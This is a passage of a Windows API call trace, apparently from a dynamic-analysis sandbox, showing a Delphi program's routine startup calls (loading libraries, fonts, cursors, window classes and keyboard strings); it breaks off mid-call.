lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahomawÿÿ", lpUsedDefaultChar=0x0) returned 6 [0281.516] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77780000 [0281.516] GetProcAddress (hModule=0x77780000, lpProcName="GetLogicalProcessorInformation") returned 0x777b2004 [0281.517] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0281.517] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2fe15b8 [0281.517] GetProcAddress (hModule=0x77780000, lpProcName="GetLogicalProcessorInformation") returned 0x777b2004 [0281.517] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x534f920 | out: Buffer=0x0, ReturnedLength=0x534f920) returned 0 [0281.517] GetLastError () returned 0x7a [0281.517] GetLogicalProcessorInformation (in: Buffer=0x63426a0, ReturnedLength=0x534f920 | out: Buffer=0x63426a0, ReturnedLength=0x534f920) returned 1 [0281.517] GetCurrentThreadId () returned 0x62c [0281.517] GetCurrentThreadId () returned 0x62c [0281.517] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.518] GetCurrentThreadId () returned 0x62c [0281.519] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x77620000 [0281.519] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0281.519] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x635f68c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0281.519] GetProcAddress (hModule=0x77620000, lpProcName="CoCreateInstanceEx") returned 0x77669d4e [0281.519] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0281.519] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x6349bbc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0281.520] GetProcAddress (hModule=0x77620000, lpProcName="CoInitializeEx") returned 0x776609ad [0281.520] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.520] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x635f68c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0281.520] GetProcAddress (hModule=0x77620000, lpProcName="CoAddRefServerProcess") returned 0x77683cf3 [0281.520] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.520] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x635f68c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0281.521] GetProcAddress (hModule=0x77620000, lpProcName="CoReleaseServerProcess") returned 0x77684314 [0281.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0281.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x635f68c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0281.521] GetProcAddress (hModule=0x77620000, lpProcName="CoResumeClassObjects") returned 0x7762ea02 [0281.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.521] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x635f68c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0281.521] GetProcAddress (hModule=0x77620000, lpProcName="CoSuspendClassObjects") returned 0x7768bb02 [0281.521] GetVersionExW (in: lpVersionInformation=0x534f850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x72f7a570, dwMinorVersion=0x635f68c, dwBuildNumber=0x77620000, dwPlatformId=0xffff, szCSDVersion="") | out: lpVersionInformation=0x534f850*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0281.522] GetVersion () returned 0x1db10106 [0281.522] GetCurrentProcessId () returned 0x470 [0281.522] GlobalAddAtomW (lpString="Delphi00000470") returned 0xc02e [0281.522] GetCurrentThreadId () returned 0x62c [0281.522] GlobalAddAtomW (lpString="ControlOfs05FC00000000062C") returned 0xc02f [0281.522] RegisterClipboardFormatW (lpszFormat="DelphiRM_GetObjectInstance") returned 0xc0ec [0281.522] SetErrorMode (uMode=0x8000) returned 0x1 [0281.522] LoadLibraryW (lpLibFileName="imm32.dll") returned 0x75fb0000 [0281.522] SetErrorMode (uMode=0x1) returned 0x8000 [0281.522] GetSystemMetrics (nIndex=19) returned 1 [0281.522] GetSystemMetrics (nIndex=75) returned 1 [0281.522] SystemParametersInfoW (in: uiAction=0x68, uiParam=0x0, pvParam=0x637c260, fWinIni=0x0 | out: pvParam=0x637c260) returned 1 [0281.522] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0281.522] LoadCursorW (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0281.522] LoadCursorW (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0281.522] LoadCursorW (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0281.523] LoadCursorW (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0281.523] LoadCursorW (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0281.523] LoadCursorW (hInstance=0x5fc0000, lpCursorName=0x7ffa) returned 0x90099 [0281.523] LoadCursorW (hInstance=0x5fc0000, lpCursorName=0x7ffb) returned 0x10131 [0281.523] LoadCursorW (hInstance=0x5fc0000, lpCursorName=0x7ffc) returned 0x10133 [0281.524] LoadCursorW (hInstance=0x5fc0000, lpCursorName=0x7ffd) returned 0x10135 [0281.524] LoadCursorW (hInstance=0x5fc0000, lpCursorName=0x7fff) returned 0x10137 [0281.524] LoadCursorW (hInstance=0x5fc0000, lpCursorName=0x7ffe) returned 0x10139 [0281.524] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0281.524] LoadCursorW (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0281.524] LoadCursorW (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0281.524] LoadCursorW (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0281.524] LoadCursorW (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0281.525] LoadCursorW (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0281.525] LoadCursorW (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0281.525] LoadCursorW (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0281.525] LoadCursorW (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0281.525] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0281.525] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0281.525] GetDC (hWnd=0x0) returned 0xc01016e [0281.525] GetDeviceCaps (hdc=0xc01016e, index=90) returned 96 [0281.525] ReleaseDC (hWnd=0x0, hDC=0xc01016e) returned 1 [0281.525] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x6122288, dwData=0x63510d8) returned 1 [0281.525] GetCurrentThread () returned 0xfffffffe [0281.525] GetCurrentThreadId () returned 0x62c [0281.525] GetCurrentThreadId () returned 0x62c [0281.525] GetCurrentThreadId () returned 0x62c [0281.525] GetCurrentThreadId () returned 0x62c [0281.526] SystemParametersInfoW (in: uiAction=0x1f, uiParam=0x5c, pvParam=0x534f894, fWinIni=0x0 | out: pvParam=0x534f894) returned 1 [0281.526] CreateFontIndirectW (lplf=0x534f894) returned 0xd0a0230 [0281.526] GetObjectW (in: h=0xd0a0230, c=92, pv=0x534f588 | out: pv=0x534f588) returned 92 [0281.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x534f489, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0281.526] SystemParametersInfoW (in: uiAction=0x29, uiParam=0x0, pvParam=0x534f69c, fWinIni=0x0 | out: pvParam=0x534f69c) returned 1 [0281.526] CreateFontIndirectW (lplf=0x534f7d8) returned 0xb0a0231 [0281.526] GetObjectW (in: h=0xb0a0231, c=92, pv=0x534f588 | out: pv=0x534f588) returned 92 [0281.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x534f489, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0281.527] CreateFontIndirectW (lplf=0x534f77c) returned 0xd0a022e [0281.527] GetObjectW (in: h=0xd0a022e, c=92, pv=0x534f588 | out: pv=0x534f588) returned 92 [0281.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x534f489, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0281.527] CreateFontIndirectW (lplf=0x534f834) returned 0x40a0229 [0281.527] GetObjectW (in: h=0x40a0229, c=92, pv=0x534f588 | out: pv=0x534f588) returned 92 [0281.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x534f489, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0281.527] CreateFontIndirectW (lplf=0x534f6b4) returned 0x50a0226 [0281.527] GetObjectW (in: h=0x50a0226, c=92, pv=0x534f588 | out: pv=0x534f588) returned 92 [0281.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Segoe UI", cchWideChar=8, lpMultiByteStr=0x534f489, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Segoe UI", lpUsedDefaultChar=0x0) returned 8 [0281.528] LoadIconW (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0281.528] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x534f716, nSize=0x100 | out: lpFilename="C:\\Windows\\Explorer.EXE") returned 0x17 [0281.528] GetClassInfoW (in: hInstance=0x5fc0000, lpClassName="TPUtilWindow", lpWndClass=0x534f6b4 | out: lpWndClass=0x534f6b4) returned 0 [0281.528] RegisterClassW (lpWndClass=0x6204678) returned 0xc0ee [0281.528] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x5fc0000, lpParam=0x0) returned 0x1010c [0281.529] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x3420000 [0281.530] SetWindowLongW (hWnd=0x1010c, nIndex=-4, dwNewLong=54661103) returned 100465804 [0281.530] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x534f775, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0281.531] GetKeyboardLayoutList (in: nBuff=64, lpList=0x534f798 | out: lpList=0x534f798) returned 1 [0281.531] LoadLibraryA (lpLibFileName="imm32.dll") returned 0x75fb0000 [0281.531] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x2fe1518 [0281.531] GetProcAddress (hModule=0x75fb0000, lpProcName="ImmIsIME") returned 0x75fb2ceb [0281.531] ImmIsIME () returned 0x1 [0281.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Keyboard Layouts\\04090409", ulOptions=0x0, samDesired=0x20019, phkResult=0x534f8a0 | out: phkResult=0x534f8a0*=0x0) returned 0x2 [0281.532] GetCurrentThreadId () returned 0x62c [0281.532] GetCurrentThreadId () returned 0x62c [0281.532] GetCurrentThreadId () returned 0x62c [0281.533] GetModuleHandleW (lpModuleName="USER32") returned 0x76270000 [0281.533] GetCurrentThreadId () returned 0x62c [0281.533] GetCurrentThreadId () returned 0x62c [0281.533] GetCurrentThreadId () returned 0x62c [0281.533] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AnimateWindow", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0281.534] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="AnimateWindow", cchWideChar=13, lpMultiByteStr=0x6349cbc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AnimateWindow", lpUsedDefaultChar=0x0) returned 13 [0281.534] GetProcAddress (hModule=0x76270000, lpProcName="AnimateWindow") returned 0x762a0620 [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] GetCurrentThreadId () returned 0x62c [0281.534] RegisterClipboardFormatW (lpszFormat="Delphi Picture") returned 0xc0ef [0281.534] RegisterClipboardFormatW (lpszFormat="Delphi Component") returned 0xc0f0 [0281.535] RegisterClipboardFormatW (lpszFormat="commdlg_help") returned 0xc0f1 [0281.535] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc0f2 [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GlobalAddAtomW (lpString="WndProcPtr05FC00000000062C") returned 0xc030 [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.535] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0be [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef9, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Alt+") returned 0x4 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef8, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Ctrl+") returned 0x5 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef7, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Shift+") returned 0x6 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef6, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Del") returned 0x3 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef5, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Ins") returned 0x3 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef4, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Down") returned 0x4 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef3, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Right") returned 0x5 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef2, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Up") returned 0x2 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef1, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Left") returned 0x4 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xfef0, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Home") returned 0x4 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff0f, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="End") returned 0x3 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff0e, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="PgDn") returned 0x4 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff0d, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="PgUp") returned 0x4 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff0c, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Space") returned 0x5 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff0b, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Enter") returned 0x5 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff0a, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Esc") returned 0x3 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff09, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="Tab") returned 0x3 [0281.536] LoadStringW (in: hInstance=0x5fc0000, uID=0xff08, lpBuffer=0x534d940, cchBufferMax=4096 | out: lpBuffer="BkSp") returned 0x4 [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.536] GetCurrentThreadId () returned 0x62c [0281.537] GetCurrentThreadId () returned 0x62c [0281.537] GetCurrentThreadId () returned 0x62c [0281.537] GetCurrentThreadId () returned 0x62c [0281.537] GetCurrentThreadId () returned 0x62c [0281.537] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x610cb49, cbMultiByte=9, lpWideCharStr=0x635fa24, cchWideChar=10 | out: lpWideCharStr="TMenuItem") returned 9 [0281.537] CharLowerBuffW (in: lpsz="TMenuItem", cchLength=0x9 | out: lpsz="tmenuitem") returned 0x9 [0281.537] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x604033b, cbMultiByte=10, lpWideCharStr=0x635fa4c, cchWideChar=11 | out: lpWideCharStr="TComponent") returned 10 [0281.537] CharLowerBuffW (in: lpsz="TComponent", cchLength=0xa | out: lpsz="tcomponent") returned 0xa [0281.537] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x60355fd, cbMultiByte=11, lpWideCharStr=0x635fa74, cchWideChar=12 | out: lpWideCharStr="TPersistent") returned 11 [0281.537] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0281.537] CharLowerBuffW (in: lpsz="TPersistent", cchLength=0xb | out: lpsz="tpersistent") returned 0xb [0281.537] GetCurrentThreadId () returned 0x62c [0281.537] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x74c90000 [0281.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeFlatSB", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0281.537] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeFlatSB", cchWideChar=16, lpMultiByteStr=0x635fa9c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeFlatSB", lpUsedDefaultChar=0x0) returned 16 [0281.538] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeFlatSB") returned 0x74d6f803 [0281.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UninitializeFlatSB", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0281.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="UninitializeFlatSB", cchWideChar=18, lpMultiByteStr=0x635fa9c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UninitializeFlatSB", lpUsedDefaultChar=0x0) returned 18 [0281.538] GetProcAddress (hModule=0x74c90000, lpProcName="UninitializeFlatSB") returned 0x74c9d1ea [0281.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollProp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0281.538] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollProp", cchWideChar=20, lpMultiByteStr=0x635fa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollProp", lpUsedDefaultChar=0x0) returned 20 [0281.539] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_GetScrollProp") returned 0x74d6f81f [0281.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollProp", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0281.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_SetScrollProp", cchWideChar=20, lpMultiByteStr=0x635fa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_SetScrollProp", lpUsedDefaultChar=0x0) returned 20 [0281.539] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollProp") returned 0x74d107d0 [0281.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_EnableScrollBar", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0281.539] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_EnableScrollBar", cchWideChar=22, lpMultiByteStr=0x635fa9c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_EnableScrollBar", lpUsedDefaultChar=0x0) returned 22 [0281.540] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_EnableScrollBar") returned 0x74d6f84b [0281.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_ShowScrollBar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0281.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_ShowScrollBar", cchWideChar=20, lpMultiByteStr=0x635fa9c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_ShowScrollBar", lpUsedDefaultChar=0x0) returned 20 [0281.540] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_ShowScrollBar") returned 0x74d6f83a [0281.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollRange", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0281.540] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollRange", cchWideChar=21, lpMultiByteStr=0x635fa9c, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FlatSB_GetScrollRange", lpUsedDefaultChar=0x0) returned 21 [0281.540] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_GetScrollRange") returned 0x74d6f829 [0281.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="FlatSB_GetScrollInfo", cchWideChar=20, 